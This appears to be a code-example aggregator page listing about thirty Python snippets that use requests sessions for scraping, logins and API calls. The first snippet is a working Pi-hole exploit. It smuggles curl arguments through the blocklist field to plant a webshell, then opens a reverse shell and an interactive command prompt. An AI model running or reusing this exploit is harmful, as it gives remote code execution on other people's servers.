예제 #1
0
def exploit(session: requests.session) -> None:
    print(
        f"[+] Got session-cookie: PHPSESSID={session.cookies.get_dict()['PHPSESSID']}"
    )

    # Get csrf token
    #print("[*] Getting CSRF-token")
    html = session.get(url=f"{url}settings.php?tab=blocklists",
                       proxies=proxy).text
    soup = BeautifulSoup(html, 'html.parser')
    token = soup.find("input", {'name': 'token'})['value']

    # Stage 1: Trigger connection to our server
    payload = f'http://{get_ip()}# -o ex.php -d "'
    data = {
        'newuserlists': payload,
        'token': token,
        'field': 'adlists',
        'submit': 'saveupdate'
    }
    session.post(url=f"{url}settings.php?tab=blocklists",
                 data=data,
                 proxies=proxy)

    # Setup http server
    http = Process(target=setup_http)
    http.daemon = True
    http.start()

    # Trigger access & file write
    for i in range(2):
        session.get(url=f"{url}scripts/pi-hole/php/gravity.sh.php",
                    proxies=proxy)

    # Verify webshell
    if verify_webshell():
        print("[+] Webshell uploaded successfully!")
        rev_shell()
        try:
            while True:
                cmd = input("cmd> ")
                print(exec(cmd))
        except KeyboardInterrupt:
            quit()
        except Exception as ex:
            raise ex
    else:
        raise Exception("Webshell not uploaded!")
예제 #2
0
    def get_recent_news_articles(session: requests.session) -> List[Dict[str, str]]:
        """
        Fetches the most recent news articles for the logged in player

        :param:  The requests session initialized by the ComunioSession
        :return: List of article dictionaries with the following attributes:
                    - date:    The article's date
                    - type:    The type of the article, e.g. 'transfers'
                    - content: The article's content
        """
        html = session.get("http://www.comunio.de/team_news.phtml").text
        soup = BeautifulSoup(html, "html.parser")

        article_headers = soup.select(".article_header1") + soup.select(".article_header2")
        article_content = soup.select(".article_content1") + soup.select(".article_content2")

        articles = []

        for index in range(0, len(article_headers)):
            header = article_headers[index].text.lstrip().rstrip()
            content = article_content[index].text.lstrip().rstrip()

            article = {
                "date": header.split(" ", 1)[0],
                "type": header.split(" > ", 1)[1],
                "content": content
            }

            articles.append(article)

        return articles
예제 #3
0
def _connect(url: str, data: str=None, headers: dict or None=None,
             auth=None, session: requests.session=__SESSION) -> requests.Response:
    """
    :param url: url
    :type url: :class:`str`
    :param data: data to post
    :type data: :class:`str`
    :param headers: headers to send
    :type headers: :class:`dict` or :class:`None`
    :param auth: the authenticate for the session.
    :type auth: :class:`requests.auth.HTTPBasicAuth`
    :param session: the session to connect to, otherwise using the default ones.
    :type session: :class:`requests.Session`

    :return: the respond of the connection
    :rtype: :class:`requests.Response`
    """
    if headers is None:
        headers = dict()

    url = url_fixer(url)

    headers['User-Agent'] = consts.USER_AGENT
    if data is not None:
        sock = session.post(url, data=data, headers=headers, auth=auth)
    else:
        sock = session.get(url, headers=headers, auth=auth)
    return sock
예제 #4
0
파일: main.py 프로젝트: Westwood-S/its
def get_authentication_data(s: requests.session, contract_number: str):
    data = s.get(url='http://cn.its.glo-ots.cn/ITS_EXPORT_AUTHENTICATION.asp?contractid={}&op=0'\
    .format(contract_number))
    data.encoding = 'gbk'
    soup = BeautifulSoup(data.text, "lxml")

    data_dict = {}
    info_dict = {}
    cargo_list = []
    tables = soup.find_all('table')

    trs = tables[8].find_all('tr')
    tds = trs[1].find_all('td')
    info_dict['目的港'] = tds[0].contents[0].rstrip().lstrip()
    info_dict['状态'] = tds[1].find('p').contents[0].rstrip().lstrip()
    info_dict['一般原产地证书'] = tds[2].find('p').contents[0].rstrip().lstrip()
    info_dict['普惠制原产地证书'] = tds[3].contents[0].rstrip().lstrip()
    info_dict['认证费用'] = tds[4].contents[0].rstrip().lstrip()

    for idx, tr in enumerate(tables[11].find_all('tr')):
        if idx != 0:
            tds = tr.find_all('td')
            cargo_dict = {}
            cargo_dict['货号'] = tds[0].find('a').contents[0].rstrip().lstrip()
            cargo_dict['品名'] = tds[1].contents[0].rstrip().lstrip()
            cargo_dict['数量'] = tds[2].contents[0].rstrip().lstrip()
            cargo_dict['件数'] = tds[3].contents[0].rstrip().lstrip()
            cargo_dict['毛重'] = tds[4].contents[0].rstrip().lstrip()
            cargo_list.append(cargo_dict)

    data_dict["货物信息"] = cargo_list
    data_dict['检验程序'] = info_dict

    return data_dict
예제 #5
0
def get_captcha(session: requests.session):
    image_data = session.get(url=CAPTCHA_IMAGE_URL, timeout=TIMEOUT)
    io_file = io.BytesIO(image_data.content)
    image = Image.open(io_file)
    image.show()

    return io_file
예제 #6
0
def get_sysconf(s: requests.session, page: str, act: str, params):
    return s.get(url=sysconf,
                 params=dict({
                     "page": page,
                     "action": act
                 }, **params),
                 verify=False)
예제 #7
0
def fetch_page(*, url: str, session: requests.session):
    req = session.get(url)
    body = req.text

    if not req.from_cache:
        # stderr('sleep 5')
        time.sleep(5)

    interactive_warning = '<title>Interactive Stories Are Temporarily Unavailable</title>'
    while interactive_warning in body:
        sleep_for_url(url)
        cache_backend.delete_url(url)
        req = session.get(url)
        body = req.text

    return body
예제 #8
0
def execute_http_call(method, url, params, retry, timeout, apiKey,
                      apiKeyPrefix):
    """
    Executes http call using requests library
    Parameters
    ----------
    method : str
    url : str
    params : dict
    retry : Retry
    timeout : tuple
    Returns
    -------
    Response
    """
    # set session
    session = Session()
    session.mount('https://',
                  HTTPAdapter(max_retries=retry))  # Documented in HTTPAdapter
    session.headers = {
        'Authorization': '{} {}'.format(apiKeyPrefix, apiKey),
        'Content-Type': 'application/json',
        'User-Agent': generate_user_agent(),
    }

    if method is "GET":
        response = session.get(url, params=params, timeout=timeout)
    elif method is "POST":
        response = session.post(url, json=params, timeout=timeout)
    else:
        raise NotImplementedError()

    return response
예제 #9
0
파일: audit.py 프로젝트: Ben0p/mine-monitor
def getInspections(after: datetime, session: requests.session, headers: dict):
    ''' 
    Get all inspections after (after: ISO Datetime)
    '''
    query = f"https://api.safetyculture.io/audits/search?field=audit_id&field=modified_at&modified_after={after}Z"
    results = session.get(query, headers=headers)
    results = results.json()
    return (results)
예제 #10
0
def downloader(session: requests.session, url: str, filename: str, **kwargs):
    with session.get(url, stream=True, **kwargs) as r:
        if r.status_code == 200:
            r.raw.decode_content = True
            with open(filename, "wb") as f:
                shutil.copyfileobj(r.raw, f)
        else:
            raise Exception("Failed to connect")
예제 #11
0
def get_sysconf_with_sid_header(s: requests.session, page: str, act: str,
                                params):
    return s.get(url=sysconf,
                 params=dict({
                     "page": page,
                     "action": act
                 }, **params),
                 verify=False,
                 headers={"sid": s.cookies.get("sid")})
예제 #12
0
async def checkPages(s: requests.session):
    for a in range(0, len(urlList)):
        res1 = s.get(url=urlList[a], allow_redirects=False)
        if not (urlResultlist[a] in res1.text):
            print(res1.text)
            f = open("page.html", 'w', encoding="utf-8")
            f.write(res1.text)
            f.close()
            return False
    return True
예제 #13
0
def get_locations(
        s: requests.session
    ) -> list:
    ''' 
    Retrieve latest locations from API
    '''
    ims_locations_url = f'https://{env.ims_ip}/api/location_stats/latest_by_asset/?format=json&limit=100000'
    locations = s.get(ims_locations_url, verify=False)
    locations = locations.json()
    return(locations)
예제 #14
0
async def loadPages(s: requests.session):
    for a in range(0, len(urlList)):
        res1 = s.get(urlList[a])
        res = re.search(regexList[a], res1.text).group(1)
        print(urlList[a])
        print(res)
        print()
        print()
        print()
        urlResultlist.append(res)
예제 #15
0
    def get_own_player_list(session: requests.session) -> List[Dict[str, str or int]]:
        """
        Creates dictionaries modelling the user's current players and returns them
        in a list.

        The format of these dictionaries is:

        name:     The player's name
        value:    The player's current value
        points:   The player's currently accumulated performance points
        position: The player's position

        :param:   The requests session initialized by the ComunioSession
        :return:  A list of the user's players as dictionaries
        """
        player_list = []

        sell_html = session.get("http://www.comunio.de/putOnExchangemarket.phtml")
        on_sale_html = session.get("http://www.comunio.de/exchangemarket.phtml?takeplayeroff_x=22")
        soups = (BeautifulSoup(sell_html.text, "html.parser"), BeautifulSoup(on_sale_html.text, "html.parser"))

        for i, soup in enumerate(soups):
            players = soup.select(".tr1") + soup.select(".tr2")

            for player in players:

                attrs = player.select("td")
                if i == 0:
                    player_info = {"name": attrs[0].text.strip(),
                                   "value": int(attrs[2].text.strip().replace(".", "")),
                                   "points": int(attrs[3].text.strip()),
                                   "position": attrs[4].text.strip()}
                elif i == 1:
                    player_info = {"name": attrs[1].text.strip(),
                                   "value": int(attrs[4].text.strip().replace(".", "")),
                                   "points": int(attrs[5].text.strip()),
                                   "position": attrs[7].text.strip()}
                else:
                    player_info = {}
                player_list.append(player_info)

        return player_list
예제 #16
0
def login(session: requests.session,
          account: str,
          password: str,
          captcha_code=None,
          save_captcha=False):
    """Login to Mo Online.

    Arguments:
        session {requests.session} -- requests session.
        account {str} -- game account.
        password {str} -- game password.
        captcha {str} -- captcha code.

    Raises:
        LoginError:
            description: error_type
            server_error: Server timeout or error
            account_error: User password or account error
            captcha_error:  captcha code error.
    Returns:
        [str] -- game login url. (moop)
    """
    page = session.get(url=LOGIN_URL, timeout=TIMEOUT)
    if not isinstance(captcha_code, str):
        get_captcha(session)
        captcha_code = input("input captcha code: ")
    csrf_parse(page.text)
    login_data = {
        'loginAccount': account,
        'loginPassword': password,
        'loginCode': captcha_code,
        'contract1': 'on',
        'contract2': 'on',
        'contract3': 'on',
        **csrf_parse(page.text)
    }

    post_login = session.post(url=LOGIN_URL, timeout=TIMEOUT, data=login_data)

    if post_login.url == START_GAME_URL and post_login.status_code == 200:
        _base_index = post_login.text.find('window.location.href') + 24
        return post_login.text[_base_index:post_login.text.
                               find('"', _base_index + 1)]

    elif post_login.textfind("密碼錯誤") > -1:
        raise LoginError(error_type='account_error',
                         account=account,
                         message="account or password wrong.")
    elif post_login.textfind("驗證碼輸入不正確") > -1:
        raise LoginError(error_type='captcha_error',
                         account=account,
                         message="captcha code error.")

    raise BaseException("Something error :(")
예제 #17
0
def check_is_student(s: requests.session) -> bool:
    """判断用户是否为学生

    Args:
        s (requests.session): session

    Returns:
        bool:
    """
    url = s.get("https://www.zhixue.com/container/container/index/").url
    return "student" in url
예제 #18
0
def getHTMLText(url: str, rssion: requests.session) -> str:
    try:
        resp = rssion.get(url, headers=PttInfo.headers)
        resp.raise_for_status()
        resp.encoding = resp.apparent_encoding
        return resp.text
    except:
        print("url: "+url)
        print("request: "+resp.request)
        print("響應: "+resp.status_code)
        return "error resp"
예제 #19
0
def get_role(s: requests.session) -> str:
    """
    获取用户角色
    :param s: session
    :return
        返回用户角色
    """
    r = s.get("https://www.zhixue.com/apicourse/web/getCurrentUser")
    data = r.json()
    if data["errorCode"] != 0:
        raise Exception(data["errorInfo"])
    return data["result"]["currentUser"]["role"]
예제 #20
0
def fetch_ads(session: Session) -> Set[AdModel]:
    url = build_url()
    ads = []

    logger.info('=== Starting fetch ads ===')

    response = session.get(url)
    if response.status_code != 200:
        logger.critical(
            '=== Unsuccessful attempt. '
            'Please check url - %s '
            'The script will be stopped ===', url)
        raise RequestsConnectionError(
            f'Unable to get urls {response.status_code}')

    soup = BeautifulSoup(response.content.decode('utf-8'), 'lxml')
    ads_items = soup.find_all('table', attrs={'summary': 'Объявление'})

    logger.info('=== Start processing %s ads ===', len(ads_items))
    for item in ads_items:

        item_url_obj = item.find('a', class_='marginright5')
        item_url, url_info, *_ = item_url_obj.attrs.get('href').split('#')

        if not settings.WITH_PROMOTED and 'promoted' in url_info:
            continue

        try:
            price = int(
                item.find(
                    'p',
                    class_='price').text.split(' грн.')[0].strip().replace(
                        ' ', ''))
        except ValueError:
            logger.exception('=== Error during parsing a price ===')
            continue

        day = item.select('small > span')[1].text.strip().split(' ')[0].lower()

        ad = AdModel(
            external_id=item.attrs.get('data-id'),
            title=item_url_obj.text.strip(),
            price=price,
            url=item_url,
        )

        if day in settings.PUBLICATION_DATE and \
                settings.MIN_PRICE <= ad.price <= settings.MAX_PRICE:
            ads.append(ad)

    result = {ad for ad in ads}
    logger.info('=== Found %s ads after filtering ===', len(result))
    return result
예제 #21
0
def get_ip(session: requests.session, raw_url: str):
    url = make_ipaddress_url(raw_url)
    try:
        rs = session.get(url, timeout=5)
        pattern = r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b"
        ip_list = re.findall(pattern, rs.text)
        ip_counter_obj = Counter(ip_list).most_common(1)
        if ip_counter_obj:
            return raw_url, ip_counter_obj[0][0]
        raise Exception("ip address empty")
    except Exception as ex:
        print("get: {}, error: {}".format(url, ex))
        raise Exception
예제 #22
0
 def get_captcha(s: requests.session):
     r = s.get("https://pass.changyan.com/kaptcha.jpg",
               params={
                   "type": "normal",
                   "d": time.time() * 1000
               })
     Image.open(BytesIO(r.content)).save("captcha.png")
     r = requests.post(f"{url}/b",
                       files={
                           'image_file':
                           ('captcha.png', open("captcha.png",
                                                "rb"), 'application')
                       })
     return r.json()["value"]
예제 #23
0
def getHTMLText(url: str, rssion: requests.session) -> str:
    try:
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'
        }
        resp = rssion.get(url, headers=headers)
        resp.raise_for_status()
        resp.encoding = resp.apparent_encoding
        return resp.text
    except:
        print("請求鏈結: " + resp.request)
        print("響應: " + resp.status_code)
        return "error resp"
예제 #24
0
파일: main.py 프로젝트: Westwood-S/its
def get_launchintoinsurance_data(s: requests.session, contract_number: str):
    data = s.get(url='http://cn.its.glo-ots.cn/its_export_launchintoinsurance.asp?contractid=%27{}%27&op=0'\
    .format(contract_number))
    data.encoding = 'gbk'
    soup = BeautifulSoup(data.text, "lxml")

    data_dict = {}
    info_dict = {}
    cargo_list = []
    tables = soup.find_all('table')

    trs = tables[8].find_all('tr')
    tds = trs[1].find_all('td')
    info_dict['船名'] = tds[0].contents[0].rstrip().lstrip()
    info_dict['航次'] = tds[1].contents[0].rstrip().lstrip()
    info_dict['目的港口'] = tds[2].contents[0].rstrip().lstrip()
    info_dict['投保金额'] = tds[3].contents[0].rstrip().lstrip()
    info_dict['保险费'] = tds[4].contents[0].rstrip().lstrip()
    info_dict['保单号'] = tds[5].contents[0].rstrip().lstrip()

    if info_dict['保单号'] == '未办理':
        for idx, tr in enumerate(tables[10].find_all('tr')):
            if idx != 0:
                tds = tr.find_all('td')
                cargo_dict = {}
                a = tds[0].find_all('a')
                cargo_dict['货号'] = a[0].contents[0].rstrip().lstrip()
                cargo_dict['品名'] = tds[1].contents[0].rstrip().lstrip()
                cargo_dict['数量'] = tds[2].contents[0].rstrip().lstrip()
                cargo_dict['件数'] = tds[3].contents[0].rstrip().lstrip()
                cargo_dict['毛重'] = tds[4].contents[0].rstrip().lstrip()
                cargo_list.append(cargo_dict)
    else:
        for idx, tr in enumerate(tables[12].find_all('tr')):
            if idx != 0:
                tds = tr.find_all('td')
                cargo_dict = {}
                a = tds[0].find_all('a')
                cargo_dict['货号'] = a[0].contents[0].rstrip().lstrip()
                cargo_dict['品名'] = tds[1].contents[0].rstrip().lstrip()
                cargo_dict['数量'] = tds[2].contents[0].rstrip().lstrip()
                cargo_dict['件数'] = tds[3].contents[0].rstrip().lstrip()
                cargo_dict['毛重'] = tds[4].contents[0].rstrip().lstrip()
                cargo_list.append(cargo_dict)

    data_dict["货物信息"] = cargo_list
    data_dict['保险信息'] = info_dict

    return data_dict
예제 #25
0
def captcha_solver(captcha_image_url: str, session: requests.session) -> dict:
    response = session.get(captcha_image_url)
    encoded_string = base64.b64encode(response.content)
    url = "https://api.apitruecaptcha.org/one/gettext"

    data = {
        "userid": TRUECAPTCHA_USERID,
        "apikey": TRUECAPTCHA_APIKEY,
        "case": "mixed",
        "mode": "human",
        "data": str(encoded_string)[2:-1],
    }
    r = requests.post(url=url, json=data)
    j = json.loads(r.text)
    return j
예제 #26
0
def validate_session(session: requests.session) -> bool:
    # Validate by visit settings, anonymous user will be redirected
    # to login page.
    settings_url = "https://www.zhihu.com/settings/profile"
    verify_rsp = session.get(settings_url)

    if not (verify_rsp.url == settings_url):
        obsolete_session_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),
                                             SESSION_FILENAME)
        if os.path.exists(obsolete_session_file):
            os.remove(obsolete_session_file)

        raise ValueError("check COOKIE_VALUE in settings.py.")

    return True
def retrieve(url):
    session = RequestSession()
    headers = {
        'User-Agent':
        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3'
    }
    request = session.get(url, headers=headers)

    if not request.ok:
        return False

    res = BytesIO()
    res.write(request.content)

    return res
예제 #28
0
 def try_get_url(cls,
                 session: requests.session,
                 url: str,
                 *,
                 try_times: int = 3,
                 try_timeout: int = 5,
                 **kwargs) -> Optional[requests.Response]:
     for _ in range(try_times):
         try:
             r = session.get(url=url, timeout=try_timeout, **kwargs)
             return r
         except (requests.exceptions.ConnectionError,
                 requests.exceptions.ReadTimeout) as e:
             pass
     return None
예제 #29
0
파일: audit.py 프로젝트: Ben0p/mine-monitor
def getInspectionDetails(inspections: list, session: requests.session,
                         headers: dict):
    ''' 
    For each inspection, get the details
    '''
    details = []
    for inspection in inspections['audits']:
        results = session.get(
            f"https://api.safetyculture.io/audits/{inspection['audit_id']}",
            headers=headers)
        results = results.json()
        # Convert date time strings to datetime object
        results['created_at'] = datetime.strptime(results['created_at'],
                                                  '%Y-%m-%dT%H:%M:%S.%fZ')
        results['modified_at'] = datetime.strptime(results['modified_at'],
                                                   '%Y-%m-%dT%H:%M:%S.%fZ')
        details.append(results)
    return (details)
예제 #30
0
파일: main.py 프로젝트: Westwood-S/its
def get_shipment_data(s: requests.session, contract_number: str):
    global config

    data = s.get(url='http://cn.its.glo-ots.cn/ITS_EXPORT_SHIPMENT.asp?contractid={}&op=0'\
    .format(contract_number))
    data.encoding = 'gbk'
    soup = BeautifulSoup(data.text, "lxml")

    data_dict = {}
    info_dict = {}
    cargo_list = []
    tables = soup.find_all('table')

    trs = tables[8].find_all('tr')
    tds = trs[1].find_all('td')
    info_dict['提单号'] = tds[0].find('p').contents[0].rstrip().lstrip()
    info_dict['目的港'] = tds[1].find('p').contents[0].rstrip().lstrip()
    info_dict['船名'] = tds[2].contents[0].rstrip().lstrip()
    info_dict['航次'] = tds[3].contents[0].rstrip().lstrip()
    info_dict['装船日期'] = tds[4].find('p').contents[0].rstrip().lstrip()

    trs = tables[9].find_all('tr')
    tds = trs[1].find_all('td')
    info_dict['20FCL海洋运费'] = tds[0].find('p').contents[0].rstrip().lstrip()
    info_dict['40FCL海洋运费'] = tds[1].find('p').contents[0].rstrip().lstrip()
    info_dict['付费方式'] = tds[2].find('p').contents[0].rstrip().lstrip()
    info_dict['20FCL个数'] = tds[3].find('p').contents[0].rstrip().lstrip()
    info_dict['40FCL个数'] = tds[4].find('p').contents[0].rstrip().lstrip()

    for idx, tr in enumerate(tables[10].find_all('tr')):
        if idx != 0:
            tds = tr.find_all('td')
            cargo_dict = {}
            cargo_dict['货号'] = tds[0].find('a').contents[0].rstrip().lstrip()
            cargo_dict['品名'] = tds[1].contents[0].rstrip().lstrip()
            cargo_dict['数量'] = tds[2].contents[0].rstrip().lstrip()
            cargo_dict['件数'] = tds[3].contents[0].rstrip().lstrip()
            cargo_dict['毛重'] = tds[4].contents[0].rstrip().lstrip()
            cargo_list.append(cargo_dict)

    data_dict["货物信息"] = cargo_list
    data_dict['装船信息'] = info_dict

    return data_dict
예제 #31
0
def get_servers(sess_id: str, session: requests.session) -> {}:
    d = {}
    url = "https://support.euserv.com/index.iphp?sess_id=" + sess_id
    headers = {
        "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
                      "Chrome/83.0.4103.116 Safari/537.36",
        "origin": "https://www.euserv.com"
    }
    f = session.get(url=url, headers=headers)
    f.raise_for_status()
    soup = BeautifulSoup(f.text, 'html.parser')
    for tr in soup.select('#kc2_order_customer_orders_tab_content_1 .kc2_order_table.kc2_content_table tr'):
        server_id = tr.select('.td-z1-sp1-kc')
        if not len(server_id) == 1:
            continue
        flag = True if tr.select('.td-z1-sp2-kc .kc2_order_action_container')[
                           0].get_text().find('Contract extension possible from') == -1 else False
        d[server_id[0].get_text()] = flag
    return d